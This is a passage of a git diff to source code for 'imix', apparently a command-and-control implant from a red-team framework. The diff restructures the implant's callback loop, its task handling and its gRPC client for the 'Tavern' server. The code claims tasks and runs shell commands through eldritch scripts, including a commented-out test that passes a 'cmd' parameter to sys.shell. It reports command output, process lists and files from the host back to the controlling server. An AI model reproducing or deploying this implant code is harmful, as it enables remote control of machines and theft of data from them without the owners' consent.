.interval - .checked_sub(_loop_start_time.elapsed().as_secs()) - .unwrap_or_else(|| 0); - - #[cfg(debug_assertions)] - eprintln!( - "[{}]: Sleeping seconds {}", - (Instant::now() - _loop_start_time).as_millis(), - time_to_sleep - ); - - std::thread::sleep(std::time::Duration::new(time_to_sleep as u64, 24601)); // This just sleeps our thread. - - // Check status & send response - #[cfg(debug_assertions)] - eprintln!( - "[{}]: Checking task status", - (Instant::now() - _loop_start_time).as_millis() - ); - - // Update running tasks and results - match submit_task_output( - _loop_start_time, - tavern_client, - &mut all_exec_futures, - &mut all_task_res_map, - ) - .await - { - Ok(_is_ok) => {} - Err(_local_err) => { - #[cfg(debug_assertions)] - eprintln!( - "[{}]: Error submitting task results {}", - (Instant::now() - _loop_start_time).as_millis(), - _local_err - ); - do_delay(imix_config.callback_config.interval, _loop_start_time); - } - }; + log::error!("callback loop fatal: {_err}"); - // Debug loop tracker - #[cfg(debug_assertions)] - if let Some(count_max) = _loop_count_max { - debug_loop_count += 1; - if debug_loop_count >= count_max { - return Ok(()); + tokio::time::sleep(Duration::from_secs(retry_interval)).await; } } } } -pub fn main() -> Result<(), imix::Error> { - let matches = Command::new("imix") - .arg( - arg!( - -c --config "Sets a custom config file" - ) - .required(false), - ) - .subcommand( - Command::new("install").about("Run in install mode").arg( - arg!( - -c --config "Sets a custom config file" - ) - .required(false), - ), - ) - .get_matches(); +async fn run(cfg: Config) -> Result<()> { + let mut agent = Agent::gen_from_config(cfg).await?; - match matches.subcommand() { - Some(("install", args)) => { - let config_path = args.value_of("config"); - match install::install_main(config_path) { - Ok(_) => {} - Err(local_err) => { - eprintln!( - "An error occured during installation: {}", - local_err.to_string() - ) - } - }; - } - _ => {} - } - - let runtime = tokio::runtime::Builder::new_multi_thread() - .worker_threads(128) - .enable_all() - .build() - .unwrap(); - - if let Some(config_path) = matches.value_of("config") { - match runtime.block_on(main_loop(config_path.to_string(), None)) { - Ok(_) => {} - Err(error) => eprintln!( - "Imix main_loop exited unexpectedly with config: {}\n{}", - config_path.to_string(), - error - ), - } - } + agent.callback_loop().await; Ok(()) } -#[cfg(test)] -mod tests { - - #[test] - fn imix_handle_exec_tome() {} - // #[test] - // fn imix_test_main_loop_sleep_twice_short() -> Result<()> { - // // Response expectations are poped in reverse order. - // let server = Server::run(); - // let test_task_id = "17179869185".to_string(); - // let post_result_response = GraphQLResponse { - // data: Some(SubmitTaskResult { - // id: test_task_id.clone(), - // }), - // errors: None, - // extensions: None, - // }; - // server.expect( - // Expectation::matching(all_of![ - // request::method_path("POST", "/graphql"), - // request::body(matches(".*variables.*execStartedAt.*")) - // ]) - // .times(1) - // .respond_with(status_code(200).body(serde_json::to_string(&post_result_response)?)), - // ); - - // let test_task = Task { - // id: test_task_id, - // quest: Quest { - // id: "4294967297".to_string(), - // name: "Exec stuff".to_string(), - // parameters: None, - // tome: Tome { - // id: "21474836482".to_string(), - // name: "sys exec".to_string(), - // description: "Execute system things.".to_string(), - // param_defs: None, - // eldritch: r#" - // def test(): - // if sys.is_macos(): - // sys.shell("sleep 3") - // if sys.is_linux(): - // sys.shell("sleep 3") - // if sys.is_windows(): - // sys.shell("timeout 3") - // test() - // print("main_loop_test_success")"# - // .to_string(), - // files: None, - // }, - // bundle: None, - // }, - // }; - // let claim_task_response = GraphQLResponse { - // data: Some(ClaimTasksResponseData { - // claim_tasks: vec![test_task.clone(), test_task.clone()], - // }), - // errors: None, - // extensions: None, - // }; - // server.expect( - // Expectation::matching(all_of![ - // request::method_path("POST", "/graphql"), - // request::body(matches(".*variables.*hostPlatform.*")) - // ]) - // .times(1) - // .respond_with(status_code(200).body(serde_json::to_string(&claim_task_response)?)), - // ); - // let url = server.url("/graphql").to_string(); - - // let tmp_file_new = NamedTempFile::new()?; - // let path_new = String::from(tmp_file_new.path().to_str().unwrap()).clone(); - // let _ = std::fs::write( - // path_new.clone(), - // format!( - // r#"{{ - // "service_configs": [], - // "target_forward_connect_ip": "127.0.0.1", - // "target_name": "test1234", - // "callback_config": {{ - // "interval": 4, - // "jitter": 0, - // "timeout": 4, - // "c2_configs": [ - // {{ - // "priority": 1, - // "uri": "{url}" - // }} - // ] - // }} - // }}"# - // ), - // ); - - // let runtime = tokio::runtime::Builder::new_multi_thread() - // .enable_all() - // .build() - // .unwrap(); - - // // Define a future for our execution task - // let start_time = Utc::now().time(); - // let exec_future = main_loop(path_new, Some(1)); - // let _result = runtime.block_on(exec_future).unwrap(); - // let end_time = Utc::now().time(); - // let diff = (end_time - start_time).num_milliseconds(); - // assert!(diff < 4500); - // Ok(()) - // } - - // #[test] - // fn imix_test_main_loop_run_once() -> Result<()> { - // let test_task_id = "17179869185".to_string(); - - // // Response expectations are poped in reverse order. - // let server = Server::run(); - - // let post_result_response = GraphQLResponse { - // data: Some(SubmitTaskResult { - // id: test_task_id.clone(), - // }), - // errors: None, - // extensions: None, - // }; - // server.expect( - // Expectation::matching(all_of![ - // request::method_path("POST", "/graphql"), - // request::body(matches(".*variables.*execStartedAt.*")) - // ]) - // .times(1) - // .respond_with(status_code(200).body(serde_json::to_string(&post_result_response)?)), - // ); - - // let claim_task_response = GraphQLResponse { - // data: Some(ClaimTasksResponseData { - // claim_tasks: vec![Task { - // id: test_task_id.clone(), - // quest: Quest { - // id: "4294967297".to_string(), - // name: "Exec stuff".to_string(), - // parameters: Some(r#"{"cmd":"echo main_loop_test_success"}"#.to_string()), - // tome: Tome { - // id: "21474836482".to_string(), - // name: "sys exec".to_string(), - // description: "Execute system things.".to_string(), - // param_defs: Some(r#"[{"name":"cmd","type":"string"}]"#.to_string()), - // eldritch: r#"print(sys.shell(input_params["cmd"]))"#.to_string(), - // files: None, - // }, - // bundle: None, - // }, - // }], - // }), - // errors: None, - // extensions: None, - // }; - // server.expect( - // Expectation::matching(all_of![ - // request::method_path("POST", "/graphql"), - // request::body(matches(".*variables.*hostPlatform.*")) - // ]) - // .times(1) - // .respond_with(status_code(200).body(serde_json::to_string(&claim_task_response)?)), - // ); - // let url = server.url("/graphql").to_string(); - - // let tmp_file_new = NamedTempFile::new()?; - // let path_new = String::from(tmp_file_new.path().to_str().unwrap()).clone(); - // let _ = std::fs::write( - // path_new.clone(), - // format!( - // r#"{{ - // "service_configs": [], - // "target_forward_connect_ip": "127.0.0.1", - // "target_name": "test1234", - // "callback_config": {{ - // "interval": 4, - // "jitter": 1, - // "timeout": 4, - // "c2_configs": [ - // {{ - // "priority": 1, - // "uri": "{url}" - // }} - // ] - // }} - // }}"# - // ), - // ); - - // let runtime = tokio::runtime::Builder::new_multi_thread() - // .enable_all() - // .build() - // .unwrap(); - - // let exec_future = main_loop(path_new, Some(1)); - // let _result = runtime.block_on(exec_future)?; - // assert!(true); - // Ok(()) - // } +#[cfg(debug_assertions)] +fn init_logging() { + pretty_env_logger::formatted_timed_builder() + .filter_level(log::LevelFilter::Info) + .parse_env("IMIX_LOG") + .init(); } diff --git a/implants/imix/src/task.rs b/implants/imix/src/task.rs new file mode 100644 index 000000000..7746b76a8 --- /dev/null +++ b/implants/imix/src/task.rs @@ -0,0 +1,97 @@ +use anyhow::Result; +use c2::{ + pb::{ReportProcessListRequest, ReportTaskOutputRequest, TaskError, TaskOutput}, + TavernClient, +}; +use eldritch::Output; +use tokio::task::JoinHandle; + +/* + * Task handle is responsible for tracking a running task and reporting it's output. + */ +pub struct TaskHandle { + id: i64, + handle: JoinHandle<()>, + output: Output, +} + +impl TaskHandle { + // Track a new task handle. + pub fn new(id: i64, output: Output, handle: JoinHandle<()>) -> TaskHandle { + TaskHandle { id, handle, output } + } + + // Returns true if the task has been completed, false otherwise. + pub fn is_finished(&self) -> bool { + self.handle.is_finished() + } + + // Report any available task output. + pub async fn report(&mut self, tavern: &mut TavernClient) -> Result<()> { + let exec_started_at = self.output.get_exec_started_at(); + let exec_finished_at = self.output.get_exec_finished_at(); + let text = self.output.collect(); + let err = match self.output.collect_errors().pop() { + Some(err) => Some(TaskError { + msg: err.to_string(), + }), + None => None, + }; + + #[cfg(debug_assertions)] + log::info!( + "collected task output: task_id={}, exec_started_at={}, exec_finished_at={}, output={}, error={}", + self.id, + match exec_started_at.clone() { + Some(t) => t.to_string(), + None => String::from(""), + }, + match exec_finished_at.clone() { + Some(t) => t.to_string(), + None => String::from(""), + }, + text.join(""), + match err.clone() { + Some(_err) => _err.msg, + None => String::from(""), + } + ); + + if text.len() > 0 + || err.is_some() + || exec_started_at.is_some() + || exec_finished_at.is_some() + { + #[cfg(debug_assertions)] + log::info!("reporting task output: task_id={}", self.id); + + tavern + .report_task_output(ReportTaskOutputRequest { + output: Some(TaskOutput { + id: self.id, + output: text.join(""), + error: err, + exec_started_at: exec_started_at, + exec_finished_at: exec_finished_at, + }), + }) + .await?; + } + + // Report Process Lists + let process_lists = self.output.collect_process_lists(); + for list in process_lists { + #[cfg(debug_assertions)] + log::info!("reporting process list: len={}", list.list.len()); + + tavern + .report_process_list(ReportProcessListRequest { + task_id: self.id, + list: Some(list), + }) + .await?; + } + + Ok(()) + } +} diff --git a/implants/imix/src/tasks.rs b/implants/imix/src/tasks.rs deleted file mode 100644 index 085b23f8c..000000000 --- a/implants/imix/src/tasks.rs +++ /dev/null @@ -1,308 +0,0 @@ -use std::collections::HashMap; -use std::time::{Duration, Instant}; - -use crate::exec::{handle_exec_timeout_and_response, AsyncTask}; -use crate::init::AgentProperties; -use crate::{Config, TaskID}; -use anyhow::{Context, Result}; -use c2::pb::c2_manual_client::TavernClient; -use c2::pb::{ - Agent, Beacon, ClaimTasksRequest, Host, ReportTaskOutputRequest, ReportTaskOutputResponse, - Task, TaskError, TaskOutput, -}; -use chrono::Utc; -use std::sync::mpsc::{channel, Receiver}; -use tokio::task; -use tonic::Status; - -pub fn drain_sender(reciever: &Receiver) -> Result { - let mut channel_res: Vec = Vec::new(); - loop { - let new_res_line = match reciever.recv_timeout(Duration::from_millis(100)) { - Ok(local_res_string) => local_res_string, - Err(local_err) => { - match local_err.to_string().as_str() { - "channel is empty and sending half is closed" => { - break; - } - "timed out waiting on channel" => { - break; - } - _ => eprint!("Error: {}", local_err), - } - break; - } - }; - // let appended_line = format!("{}{}", res.to_owned(), new_res_line); - channel_res.push(new_res_line); - } - Ok(channel_res.join("")) -} - -pub async fn get_new_tasks( - agent_properties: AgentProperties, - imix_config: Config, - mut tavern_client: TavernClient, -) -> Result> { - let req = tonic::Request::new(ClaimTasksRequest { - beacon: Some(Beacon { - identifier: agent_properties.beacon_id.clone(), - principal: agent_properties.principal.clone(), - host: Some(Host { - identifier: agent_properties.host_id.clone(), - name: agent_properties.hostname.clone(), - platform: agent_properties.host_platform.try_into()?, - primary_ip: agent_properties - .primary_ip - .clone() - .context("primary ip not found")?, - }), - agent: Some(Agent { - identifier: agent_properties.agent_id.clone(), - }), - interval: imix_config.callback_config.interval, - }), - }); - let new_tasks = match tavern_client.claim_tasks(req).await { - Ok(resp) => resp.get_ref().tasks.clone(), - Err(_error) => { - #[cfg(debug_assertions)] - eprintln!("main_loop: error claiming task\n{:?}", _error); - let empty_vec = vec![]; - empty_vec - } - }; - Ok(new_tasks) -} - -pub async fn start_new_tasks( - new_tasks: Vec, - all_exec_futures: &mut HashMap, - debug_start_time: Instant, -) -> Result<()> { - for task in new_tasks { - #[cfg(debug_assertions)] - eprintln!("Parameters:\n{:?}", task.clone().parameters); - #[cfg(debug_assertions)] - eprintln!("Launching:\n{:?}", task.clone().eldritch); - - let (sender, receiver) = channel::(); - let (error_sender, error_receiver) = channel::(); - let exec_with_timeout = handle_exec_timeout_and_response( - task.clone(), - sender.clone(), - error_sender.clone(), - None, - ); - - #[cfg(debug_assertions)] - eprintln!( - "[{}]: Queueing task {}", - (Instant::now() - debug_start_time).as_millis(), - task.clone().id - ); - - match all_exec_futures.insert( - task.clone().id, - AsyncTask { - future_join_handle: task::spawn(exec_with_timeout), - start_time: Utc::now(), - grpc_task: task.clone(), - print_reciever: receiver, - error_reciever: error_receiver, - }, - ) { - Some(_old_task) => { - #[cfg(debug_assertions)] - eprintln!("main_loop: error adding new task. Non-unique taskID\n"); - } - None => { - #[cfg(debug_assertions)] - eprintln!("main_loop: Task queued successfully\n"); - } // Task queued successfully - } - - #[cfg(debug_assertions)] - eprintln!( - "[{}]: Queued task {}", - (Instant::now() - debug_start_time).as_millis(), - task.clone().id - ); - } - Ok(()) -} - -fn queue_task_output( - async_task: &AsyncTask, - task_id: TaskID, - running_task_res_map: &mut HashMap>, -) -> Result<()> { - let task_channel_output = drain_sender(&async_task.print_reciever)?; - let task_channel_error = drain_sender(&async_task.error_reciever)?; - - let task_is_finished = async_task.future_join_handle.is_finished(); - let task_response_exec_finished_at = match task_is_finished { - true => Some(Utc::now()), - false => None, - }; - - // If the task is finished or there's new data queue a new task result. - if task_is_finished || task_channel_output.len() > 0 { - let task_error = if task_channel_error.len() > 0 { - Some(TaskError { - msg: task_channel_error, - }) - } else { - None - }; - - let task_response = TaskOutput { - id: async_task.grpc_task.id.clone(), - exec_started_at: Some(prost_types::Timestamp { - seconds: async_task.start_time.timestamp(), - nanos: async_task.start_time.timestamp_subsec_nanos() as i32, - }), - exec_finished_at: match task_response_exec_finished_at { - Some(timestamp) => Some(prost_types::Timestamp { - seconds: timestamp.timestamp(), - nanos: timestamp.timestamp_subsec_nanos() as i32, - }), - None => None, - }, - output: task_channel_output, - error: task_error, - }; - - running_task_res_map - .entry(task_id) - .and_modify(|cur_list| { - cur_list.push(task_response.clone()); - }) - .or_insert(vec![task_response]); - } - Ok(()) -} - -pub async fn submit_task_output( - loop_start_time: Instant, - mut tavern_client: TavernClient, - all_exec_futures: &mut HashMap, - running_task_res_map: &mut HashMap>, -) -> Result<()> { - // let mut running_exec_futures: HashMap = HashMap::new(); - - for (task_id, async_task) in all_exec_futures.into_iter() { - #[cfg(debug_assertions)] - eprintln!( - "[{}]: Task # {} is_finished? {}", - (Instant::now() - loop_start_time).as_millis(), - task_id, - async_task.future_join_handle.is_finished() - ); - - // Loop over each line of output from the task and append it the the channel output. - queue_task_output(async_task, *task_id, running_task_res_map)?; - } - - // Iterate over queued task results and send them back to the server - for (task_id, task_res) in running_task_res_map.clone().into_iter() { - for output in task_res { - match send_tavern_output(&mut tavern_client, output).await { - Ok(_) => { - // Remove output that has been reported sucessfully. - running_task_res_map.remove(&task_id); - } - Err(_err) => { - #[cfg(debug_assertions)] - eprintln!("Failed to submit task resluts:\n{}", _err.to_string()); - {} - } - }; - } - } - - // Iterate over all tasks and remove finished ones. - all_exec_futures.retain(|_index, exec_task| !exec_task.future_join_handle.is_finished()); - - Ok(()) -} - -async fn send_tavern_output( - tavern_client: &mut TavernClient, - output: TaskOutput, -) -> Result, Status> { - let req = tonic::Request::new(ReportTaskOutputRequest { - output: Some(output), - }); - tavern_client.report_task_output(req).await -} - -#[cfg(test)] -mod tests { - use anyhow::Result; - use c2::pb::Task; - use std::collections::HashMap; - use std::time::Instant; - - use crate::exec::AsyncTask; - use crate::TaskID; - - use super::start_new_tasks; - - #[tokio::test] - async fn imix_test_start_new_tasks() -> Result<()> { - let debug_start_time = Instant::now(); - let mut all_exec_futures: HashMap = HashMap::new(); - let new_tasks = vec![Task { - id: 123, - eldritch: "print('okay')".to_string(), - parameters: HashMap::from([("iter".to_string(), "3".to_string())]), - file_names: Vec::new(), - quest_name: "test_quest".to_string(), - }]; - start_new_tasks(new_tasks, &mut all_exec_futures, debug_start_time).await?; - assert_eq!(all_exec_futures.len(), 1); - for (task_id, _async_task) in all_exec_futures.into_iter() { - assert_eq!(task_id, 123); - } - Ok(()) - } - - // #[test] - // fn imix_test_queue_task_output() -> Result<()> { - // let (sender, receiver) = channel::(); - - // let test_task = Task { - // id: 123, - // eldritch: "print('okay')".to_string(), - // parameters: HashMap::from([("iter".to_string(), "3".to_string())]), - // }; - // let exec_with_timeout = - // handle_exec_timeout_and_response(test_task.clone(), sender.clone(), None); - - // let async_task = AsyncTask { - // future_join_handle: task::spawn(exec_with_timeout), - // start_time: Utc::now(), - // grpc_task: test_task, - // print_reciever: receiver, - // }; - // let task_id = 123; - // let mut running_task_res_map: HashMap> = HashMap::new(); - // let loop_start_time = Instant::now(); - // for _ in 1..10 { - // queue_task_output( - // &async_task, - // task_id, - // &mut running_task_res_map, - // loop_start_time, - // ); - // thread::sleep(Duration::from_millis(200)); - // } - // assert_eq!(running_task_res_map.len(), 1); - // for (local_task_id, vec_task_output) in running_task_res_map { - // assert_eq!(local_task_id, 123); - // println!("vec_task_output: {:?}", vec_task_output); - // } - // Ok(()) - // } -} diff --git a/implants/imix/src/version.rs b/implants/imix/src/version.rs new file mode 100644 index 000000000..ed478342e --- /dev/null +++ b/implants/imix/src/version.rs @@ -0,0 +1,7 @@ +macro_rules! crate_version { + () => { + env!("CARGO_PKG_VERSION") + }; +} + +pub const VERSION: &'static str = crate_version!(); diff --git a/implants/lib/c2/Cargo.toml b/implants/lib/c2/Cargo.toml index 1a0da88ae..5882929e2 100644 --- a/implants/lib/c2/Cargo.toml +++ b/implants/lib/c2/Cargo.toml @@ -1,16 +1,18 @@ [package] name = "c2" -version = "0.0.4" +version = "0.0.5" edition = "2021" # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html [dependencies] +eldritch = { workspace = true } tonic = { workspace = true, features = ["tls-roots"] } prost = { workspace = true} prost-types = { workspace = true } tokio = { workspace = true, features = ["macros", "rt-multi-thread"] } [build-dependencies] +eldritch = { workspace = true } tonic-build = { workspace = true } which = { workspace = true } diff --git a/implants/lib/c2/build.rs b/implants/lib/c2/build.rs index 0ef16ccc7..b13349092 100644 --- a/implants/lib/c2/build.rs +++ b/implants/lib/c2/build.rs @@ -17,10 +17,12 @@ fn main() -> Result<(), Box> { match tonic_build::configure() .out_dir("./src") .build_server(false) - .compile(&["c2.proto"], &["../../../tavern/internal/c2/"]) + .extern_path(".eldritch", "::eldritch::pb") + .compile(&["c2.proto"], &["../../../tavern/internal/c2/proto/"]) { Err(err) => { println!("WARNING: Failed to compile protos: {}", err); + panic!("{}", err); } Ok(_) => println!("Generating protos"), } diff --git a/implants/lib/c2/src/c2.rs b/implants/lib/c2/src/c2.rs index 918fd6298..0f6b03081 100644 --- a/implants/lib/c2/src/c2.rs +++ b/implants/lib/c2/src/c2.rs @@ -82,120 +82,15 @@ pub mod host { } } } -/// Process running on the host system. -#[allow(clippy::derive_partial_eq_without_eq)] -#[derive(Clone, PartialEq, ::prost::Message)] -pub struct Process { - #[prost(uint64, tag = "1")] - pub pid: u64, - #[prost(uint64, tag = "2")] - pub ppid: u64, - #[prost(string, tag = "3")] - pub name: ::prost::alloc::string::String, - #[prost(string, tag = "4")] - pub principal: ::prost::alloc::string::String, - #[prost(string, tag = "5")] - pub path: ::prost::alloc::string::String, - #[prost(string, tag = "6")] - pub cmd: ::prost::alloc::string::String, - #[prost(string, tag = "7")] - pub env: ::prost::alloc::string::String, - #[prost(string, tag = "8")] - pub cwd: ::prost::alloc::string::String, - #[prost(enumeration = "process::Status", tag = "9")] - pub status: i32, -} -/// Nested message and enum types in `Process`. -pub mod process { - #[derive( - Clone, - Copy, - Debug, - PartialEq, - Eq, - Hash, - PartialOrd, - Ord, - ::prost::Enumeration - )] - #[repr(i32)] - pub enum Status { - Unspecified = 0, - Unknown = 1, - Idle = 2, - Run = 3, - Sleep = 4, - Stop = 5, - Zombie = 6, - Tracing = 7, - Dead = 8, - WakeKill = 9, - Waking = 10, - Parked = 11, - LockBlocked = 12, - UninteruptibleDiskSleep = 13, - } - impl Status { - /// String value of the enum field names used in the ProtoBuf definition. - /// - /// The values are not transformed in any way and thus are considered stable - /// (if the ProtoBuf definition does not change) and safe for programmatic use. - pub fn as_str_name(&self) -> &'static str { - match self { - Status::Unspecified => "STATUS_UNSPECIFIED", - Status::Unknown => "STATUS_UNKNOWN", - Status::Idle => "STATUS_IDLE", - Status::Run => "STATUS_RUN", - Status::Sleep => "STATUS_SLEEP", - Status::Stop => "STATUS_STOP", - Status::Zombie => "STATUS_ZOMBIE", - Status::Tracing => "STATUS_TRACING", - Status::Dead => "STATUS_DEAD", - Status::WakeKill => "STATUS_WAKE_KILL", - Status::Waking => "STATUS_WAKING", - Status::Parked => "STATUS_PARKED", - Status::LockBlocked => "STATUS_LOCK_BLOCKED", - Status::UninteruptibleDiskSleep => "STATUS_UNINTERUPTIBLE_DISK_SLEEP", - } - } - /// Creates an enum from field names used in the ProtoBuf definition. - pub fn from_str_name(value: &str) -> ::core::option::Option { - match value { - "STATUS_UNSPECIFIED" => Some(Self::Unspecified), - "STATUS_UNKNOWN" => Some(Self::Unknown), - "STATUS_IDLE" => Some(Self::Idle), - "STATUS_RUN" => Some(Self::Run), - "STATUS_SLEEP" => Some(Self::Sleep), - "STATUS_STOP" => Some(Self::Stop), - "STATUS_ZOMBIE" => Some(Self::Zombie), - "STATUS_TRACING" => Some(Self::Tracing), - "STATUS_DEAD" => Some(Self::Dead), - "STATUS_WAKE_KILL" => Some(Self::WakeKill), - "STATUS_WAKING" => Some(Self::Waking), - "STATUS_PARKED" => Some(Self::Parked), - "STATUS_LOCK_BLOCKED" => Some(Self::LockBlocked), - "STATUS_UNINTERUPTIBLE_DISK_SLEEP" => Some(Self::UninteruptibleDiskSleep), - _ => None, - } - } - } -} /// Task instructions for the beacon to execute. #[allow(clippy::derive_partial_eq_without_eq)] #[derive(Clone, PartialEq, ::prost::Message)] pub struct Task { #[prost(int64, tag = "1")] pub id: i64, - #[prost(string, tag = "2")] - pub eldritch: ::prost::alloc::string::String, - #[prost(map = "string, string", tag = "3")] - pub parameters: ::std::collections::HashMap< - ::prost::alloc::string::String, - ::prost::alloc::string::String, - >, - #[prost(string, repeated, tag = "4")] - pub file_names: ::prost::alloc::vec::Vec<::prost::alloc::string::String>, - #[prost(string, tag = "5")] + #[prost(message, optional, tag = "2")] + pub tome: ::core::option::Option<::eldritch::pb::Tome>, + #[prost(string, tag = "3")] pub quest_name: ::prost::alloc::string::String, } /// TaskError provides information when task execution fails. @@ -253,20 +148,8 @@ pub struct DownloadFileResponse { pub struct ReportFileRequest { #[prost(int64, tag = "1")] pub task_id: i64, - #[prost(string, tag = "2")] - pub path: ::prost::alloc::string::String, - #[prost(string, tag = "3")] - pub owner: ::prost::alloc::string::String, - #[prost(string, tag = "4")] - pub group: ::prost::alloc::string::String, - #[prost(string, tag = "5")] - pub permissions: ::prost::alloc::string::String, - #[prost(int64, tag = "6")] - pub size: i64, - #[prost(string, tag = "7")] - pub sha3_256_hash: ::prost::alloc::string::String, - #[prost(bytes = "vec", tag = "8")] - pub chunk: ::prost::alloc::vec::Vec, + #[prost(message, optional, tag = "2")] + pub chunk: ::core::option::Option<::eldritch::pb::File>, } #[allow(clippy::derive_partial_eq_without_eq)] #[derive(Clone, PartialEq, ::prost::Message)] @@ -274,10 +157,10 @@ pub struct ReportFileResponse {} #[allow(clippy::derive_partial_eq_without_eq)] #[derive(Clone, PartialEq, ::prost::Message)] pub struct ReportProcessListRequest { - #[prost(message, repeated, tag = "1")] - pub list: ::prost::alloc::vec::Vec, - #[prost(int64, tag = "2")] + #[prost(int64, tag = "1")] pub task_id: i64, + #[prost(message, optional, tag = "2")] + pub list: ::core::option::Option<::eldritch::pb::ProcessList>, } #[allow(clippy::derive_partial_eq_without_eq)] #[derive(Clone, PartialEq, ::prost::Message)] diff --git a/implants/lib/c2/src/c2_manual.rs b/implants/lib/c2/src/c2_manual.rs index af9f25aae..9a7c52413 100644 --- a/implants/lib/c2/src/c2_manual.rs +++ b/implants/lib/c2/src/c2_manual.rs @@ -1,154 +1,148 @@ -pub mod c2_manual_client { +use crate::pb::{ + ClaimTasksRequest, ClaimTasksResponse, DownloadFileRequest, DownloadFileResponse, + ReportFileRequest, ReportFileResponse, ReportProcessListRequest, ReportProcessListResponse, + ReportTaskOutputRequest, ReportTaskOutputResponse, +}; +use tonic::codec::ProstCodec; +use tonic::GrpcMethod; - use tonic::codec::ProstCodec; - use tonic::GrpcMethod; +static CLAIM_TASKS_PATH: &str = "/c2.C2/ClaimTasks"; +static DOWNLOAD_FILE_PATH: &str = "/c2.C2/DownloadFile"; +static REPORT_FILE_PATH: &str = "/c2.C2/ReportFile"; +static REPORT_PROCESS_LIST_PATH: &str = "/c2.C2/ReportProcessList"; +static REPORT_TASK_OUTPUT_PATH: &str = "/c2.C2/ReportTaskOutput"; - static CLAIM_TASKS_PATH: &str = "/c2.C2/ClaimTasks"; - static DOWNLOAD_FILE_PATH: &str = "/c2.C2/DownloadFile"; - static REPORT_FILE_PATH: &str = "/c2.C2/ReportFile"; - static REPORT_PROCESS_LIST_PATH: &str = "/c2.C2/ReportProcessList"; - static REPORT_TASK_OUTPUT_PATH: &str = "/c2.C2/ReportTaskOutput"; +#[derive(Debug, Clone)] +pub struct TavernClient { + grpc: tonic::client::Grpc, +} - #[derive(Debug, Clone)] - pub struct TavernClient { - grpc: tonic::client::Grpc, +impl TavernClient { + pub async fn connect(callback: String) -> Result { + let endpoint = tonic::transport::Endpoint::from_shared(callback)?; + let channel = endpoint.connect().await?; + let grpc = tonic::client::Grpc::new(channel); + Ok(Self { grpc }) } - impl TavernClient { - pub async fn connect(callback: String) -> Result { - let endpoint = tonic::transport::Endpoint::from_shared(callback)?; - let channel = endpoint.connect().await?; - let grpc = tonic::client::Grpc::new(channel); - Ok(Self { grpc }) - } - - /// - /// Contact the server for new tasks to execute. - pub async fn claim_tasks( - &mut self, - request: impl tonic::IntoRequest, - ) -> std::result::Result, tonic::Status> - { - self.grpc.ready().await.map_err(|e| { - tonic::Status::new( - tonic::Code::Unknown, - format!("Service was not ready: {}", e), - ) - })?; - let codec: ProstCodec = - tonic::codec::ProstCodec::default(); + /// + /// Contact the server for new tasks to execute. + pub async fn claim_tasks( + &mut self, + request: impl tonic::IntoRequest, + ) -> std::result::Result, tonic::Status> { + self.grpc.ready().await.map_err(|e| { + tonic::Status::new( + tonic::Code::Unknown, + format!("Service was not ready: {}", e), + ) + })?; + let codec: ProstCodec = + tonic::codec::ProstCodec::default(); - let path = tonic::codegen::http::uri::PathAndQuery::from_static(CLAIM_TASKS_PATH); - let mut req = request.into_request(); - req.extensions_mut() - .insert(GrpcMethod::new("c2.C2", "ClaimTasks")); - self.grpc.unary(req, path, codec).await - } + let path = tonic::codegen::http::uri::PathAndQuery::from_static(CLAIM_TASKS_PATH); + let mut req = request.into_request(); + req.extensions_mut() + .insert(GrpcMethod::new("c2.C2", "ClaimTasks")); + self.grpc.unary(req, path, codec).await + } - /// - /// Download a file from the server, returning one or more chunks of data. - /// The maximum size of these chunks is determined by the server. - /// The server should reply with two headers: - /// - "sha3-256-checksum": A SHA3-256 digest of the entire file contents. - /// - "file-size": The number of bytes contained by the file. - /// - /// If no associated file can be found, a NotFound status error is returned. - pub async fn download_file( - &mut self, - request: impl tonic::IntoRequest, - ) -> std::result::Result< - tonic::Response>, - tonic::Status, - > { - self.grpc.ready().await.map_err(|e| { - tonic::Status::new( - tonic::Code::Unknown, - format!("Service was not ready: {}", e), - ) - })?; - let codec: ProstCodec = - tonic::codec::ProstCodec::default(); - let path = tonic::codegen::http::uri::PathAndQuery::from_static(DOWNLOAD_FILE_PATH); - let mut req = request.into_request(); - req.extensions_mut() - .insert(GrpcMethod::new("c2.C2", "DownloadFile")); - self.grpc.server_streaming(req, path, codec).await - } + /// + /// Download a file from the server, returning one or more chunks of data. + /// The maximum size of these chunks is determined by the server. + /// The server should reply with two headers: + /// - "sha3-256-checksum": A SHA3-256 digest of the entire file contents. + /// - "file-size": The number of bytes contained by the file. + /// + /// If no associated file can be found, a NotFound status error is returned. + pub async fn download_file( + &mut self, + request: impl tonic::IntoRequest, + ) -> std::result::Result< + tonic::Response>, + tonic::Status, + > { + self.grpc.ready().await.map_err(|e| { + tonic::Status::new( + tonic::Code::Unknown, + format!("Service was not ready: {}", e), + ) + })?; + let codec: ProstCodec = + tonic::codec::ProstCodec::default(); + let path = tonic::codegen::http::uri::PathAndQuery::from_static(DOWNLOAD_FILE_PATH); + let mut req = request.into_request(); + req.extensions_mut() + .insert(GrpcMethod::new("c2.C2", "DownloadFile")); + self.grpc.server_streaming(req, path, codec).await + } - /// - /// Report a file from the host to the server. - /// Providing content of the file is optional. If content is provided: - /// - Hash will automatically be calculated and the provided hash will be ignored. - /// - Size will automatically be calculated and the provided size will be ignored. - /// Content is provided as chunks, the size of which are up to the agent to define (based on memory constraints). - /// Any existing files at the provided path for the host are replaced. - pub async fn report_file( - &mut self, - request: impl tonic::IntoStreamingRequest, - ) -> std::result::Result, tonic::Status> - { - self.grpc.ready().await.map_err(|e| { - tonic::Status::new( - tonic::Code::Unknown, - format!("Service was not ready: {}", e), - ) - })?; - let codec: ProstCodec = - tonic::codec::ProstCodec::default(); - let path = tonic::codegen::http::uri::PathAndQuery::from_static(REPORT_FILE_PATH); - let mut req = request.into_streaming_request(); - req.extensions_mut() - .insert(GrpcMethod::new("c2.C2", "ReportFile")); - self.grpc.client_streaming(req, path, codec).await - } + /// + /// Report a file from the host to the server. + /// Providing content of the file is optional. If content is provided: + /// - Hash will automatically be calculated and the provided hash will be ignored. + /// - Size will automatically be calculated and the provided size will be ignored. + /// Content is provided as chunks, the size of which are up to the agent to define (based on memory constraints). + /// Any existing files at the provided path for the host are replaced. + pub async fn report_file( + &mut self, + request: impl tonic::IntoStreamingRequest, + ) -> std::result::Result, tonic::Status> { + self.grpc.ready().await.map_err(|e| { + tonic::Status::new( + tonic::Code::Unknown, + format!("Service was not ready: {}", e), + ) + })?; + let codec: ProstCodec = + tonic::codec::ProstCodec::default(); + let path = tonic::codegen::http::uri::PathAndQuery::from_static(REPORT_FILE_PATH); + let mut req = request.into_streaming_request(); + req.extensions_mut() + 